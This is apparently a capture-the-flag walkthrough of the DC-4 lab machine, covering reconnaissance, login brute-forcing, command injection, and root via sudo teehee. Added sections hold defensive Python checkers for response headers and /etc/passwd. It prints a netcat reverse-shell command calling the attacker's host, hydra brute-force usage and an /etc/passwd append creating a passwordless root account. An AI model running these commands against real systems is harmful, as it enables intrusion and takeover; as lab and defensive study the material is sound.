Target machine page
Information gathering
Check DC4's IP address
DC4's MAC address is 00:0C:29:90:C6:B0. Scanning for live hosts with nmap shows that the IP corresponding to DC4's MAC address is 192.168.175.158.
The target's web page
Scan the ports open on DC4
┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -A -p- -sS -sC -T4 192.168.175.158
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-05 23:30 EDT
Nmap scan report for 192.168.175.158
Host is up (0.00076s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 00:0C:29:90:C6:B0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.76 ms 192.168.175.158

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.03 seconds
| Port | State | Service | Version |
|---|---|---|---|
| 22 | open | ssh | OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) |
| 80 | open | http | nginx 1.15.10 |
Web application fingerprint information
Nikto report
┌──(kali㉿kali)-[~]
└─$ nikto -host http://192.168.175.158
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.175.158
+ Target Hostname: 192.168.175.158
+ Target Port: 80
+ Start Time: 2023-04-05 23:23:30 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ 7915 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2023-04-05 23:23:58 (GMT-4) (28 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
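The four nikto findings above are all response-header hygiene issues (three missing headers and a session cookie without HttpOnly). The following checker, added here as an example and not part of the original writeup or the nikto project, parses a raw HTTP response and reports the same four conditions, so a defender can confirm a fix before re-running the scanner. Both responses below are constructed to resemble the DC-4 target and a hardened counterpart; they are not captured traffic.

```python
"""Audit an HTTP response for the header findings nikto reported on DC-4.

Added example (not the writeup's or nikto's own code). Sample responses are
constructed, not captured from the target.
"""
from typing import List, Tuple

# Headers nikto flagged as absent, with the reason each matters.
# X-XSS-Protection is a legacy header (modern browsers ignore it in favour of
# CSP); it is kept here only because the scanner reports it.
REQUIRED_HEADERS = {
    "x-frame-options": "anti-clickjacking",
    "x-content-type-options": "prevents MIME sniffing",
    "x-xss-protection": "legacy XSS filter hint",
}

# Constructed sample: mirrors the DC-4 findings (nginx, PHPSESSID without HttpOnly).
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/1.15.10\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Set-Cookie: PHPSESSID=0123456789abcdef; path=/\r\n"
    "\r\n"
    "<html><title>System Tools</title></html>"
)

# Constructed sample: the same response with the gaps closed.
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "X-Frame-Options: DENY\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-XSS-Protection: 1; mode=block\r\n"
    "Set-Cookie: PHPSESSID=0123456789abcdef; path=/; HttpOnly; SameSite=Lax\r\n"
    "\r\n"
    "<html><title>System Tools</title></html>"
)


def parse_response(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw response into its status line and (lower-cased name, value) headers."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def audit_response(raw: str) -> List[str]:
    """Return one finding per missing hardening header or non-HttpOnly cookie."""
    _status, headers = parse_response(raw)
    present = {name for name, _ in headers}
    findings = []
    for name, why in REQUIRED_HEADERS.items():
        if name not in present:
            findings.append(f"missing header {name} ({why})")
    for name, value in headers:
        if name != "set-cookie":
            continue
        cookie_name = value.split("=", 1)[0].strip()
        # Attributes follow the first ';' and are case-insensitive per RFC 6265.
        attrs = {part.strip().lower() for part in value.split(";")[1:]}
        if "httponly" not in attrs:
            findings.append(f"cookie {cookie_name} set without the HttpOnly flag")
    return findings


if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(f"[{label}]")
        for finding in audit_response(raw) or ["no findings"]:
            print("  -", finding)
```

The weak sample reproduces the four nikto items exactly; the hardened sample returns no findings. For the real target the fix would live in the nginx server block (add_header directives) and in PHP's session configuration (session.cookie_httponly), not in this script.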
Penetration process
Brute-forcing the login form's username and password
Capture the login request with Burp Suite, choose a reasonably good password wordlist, and brute-force the password.
The username is admin and the password is happy; log in.
Remote command execution
After logging in, we find that commands can be executed, for example listing files.
So can we run a command of our own choosing? Capture the request with Burp Suite and check whether it can be modified to run a different command, such as whoami; it executes successfully.
Next we can use this remote command execution to get a reverse shell.
nc -e /bin/bash 192.168.175.144 1444
Listen on port 1444 on Kali, and the reverse shell connects back successfully.
Get an interactive shell
python3 -c "import pty;pty.spawn('/bin/bash')"
SSH login
Switch to the home directory and find three users: charles, jim and sam.
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
Nothing is found in the charles and sam directories, but jim's directory does contain something.
Next, enter the backups directory and find the file old-passwords.bak. Opening it, it looks like a password wordlist, so we can guess that jim's SSH password is in there.
So next we use this wordlist to brute-force SSH.
First save these passwords into a new local file, 252 passwords in total.
Then brute-force the password with hydra.
hydra ssh://192.168.175.158 -l jim -P jim.dic -vV -f -t 64
Username jim, password jibril04.
SSH login
Privilege escalation
Looking at the mbox file, we suspect there is a mail server.
Another mail is found: switch to /var/mail and view the jim file.
We find that charles sent his password to jim; charles's password is ^xHhA&hvim0y.
Next log in via SSH as the charles user.
Check sudo permissions
sudo -l
We find that /usr/bin/teehee can be run as root without a password.
teehee privilege escalation:
The teehee command can write to files, and we can use that to escalate privileges.
Use teehee -a to append an account to /etc/passwd whose entry gives it root privileges, then switch to that user.
passwd format: [username]:[password]:[UID]:[GID]:[description]:[home directory]:[login shell]
Append a user to /etc/passwd
echo "tacoking::0:0:::/bin/bash" | sudo teehee -a /etc/passwd # privilege escalation command, appends the user
charles@dc-4:~$ su tacoking
root@dc-4:/home/charles# id
uid=0(root) gid=0(root) groups=0(root)
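The root cause here is a sudoers rule that grants NOPASSWD on a binary able to write arbitrary files, and the artifact it leaves behind is a /etc/passwd entry with UID 0, an empty password field, and a name other than root. The audit below, added here as an example and not part of the writeup or of any DC-4 tooling, parses passwd-format text using the seven-field layout given above and flags exactly those conditions, so a defender can catch this technique from the file it modifies. The sample content is constructed from the charles, jim and sam entries shown above plus the appended tacoking line; it is not a copy of the target's real file.

```python
"""Audit /etc/passwd-style text for the condition a teehee-style append creates.

Added example (not the writeup's own code). SAMPLE_PASSWD is constructed from
entries shown in the writeup and is not the target's real file.
"""
from typing import Dict, List, Tuple

# Constructed sample: a baseline plus the appended UID-0 account from the writeup.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
tacoking::0:0:::/bin/bash
"""

# Values of the password field that delegate to /etc/shadow or lock the account.
SHADOW_OR_LOCKED = {"x", "*", "!"}


def parse_passwd(text: str) -> Tuple[List[Dict[str, str]], List[Tuple[int, str]]]:
    """Split passwd text into 7-field records; lines with the wrong field count are
    returned separately so the caller can treat them as suspicious."""
    records, malformed = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            malformed.append((lineno, line))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        records.append({"name": name, "pw": pw, "uid": uid, "gid": gid,
                        "gecos": gecos, "home": home, "shell": shell})
    return records, malformed


def audit_passwd(text: str) -> List[str]:
    """Return one finding per suspicious entry.

    Flags: malformed lines, UID 0 under a name other than root, an empty password
    field (no password needed at login), and a hash stored in passwd instead of
    shadow (world-readable, so crackable offline).
    """
    records, malformed = parse_passwd(text)
    findings = []
    for lineno, line in malformed:
        findings.append(f"line {lineno}: malformed entry {line!r}")
    for rec in records:
        name, pw = rec["name"], rec["pw"]
        if rec["uid"] == "0" and name != "root":
            findings.append(f"{name}: UID 0 under a name other than root")
        if pw == "":
            findings.append(f"{name}: empty password field (no password required)")
        elif pw not in SHADOW_OR_LOCKED:
            findings.append(f"{name}: password hash stored in passwd rather than shadow")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD) or ["no findings"]:
        print("-", finding)
```

On a real host, run it over the live file (for example `audit_passwd(open("/etc/passwd").read())`) from a file-integrity job or after any sudo invocation of a file-writing binary; the complementary fix is to remove the NOPASSWD rule on /usr/bin/teehee from sudoers, since a tool that can append to arbitrary files as root is equivalent to root.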
View the flag
root@dc-4:/home/charles# cd /root
root@dc-4:/root# ls
flag.txt
root@dc-4:/root# cat flag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!

Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.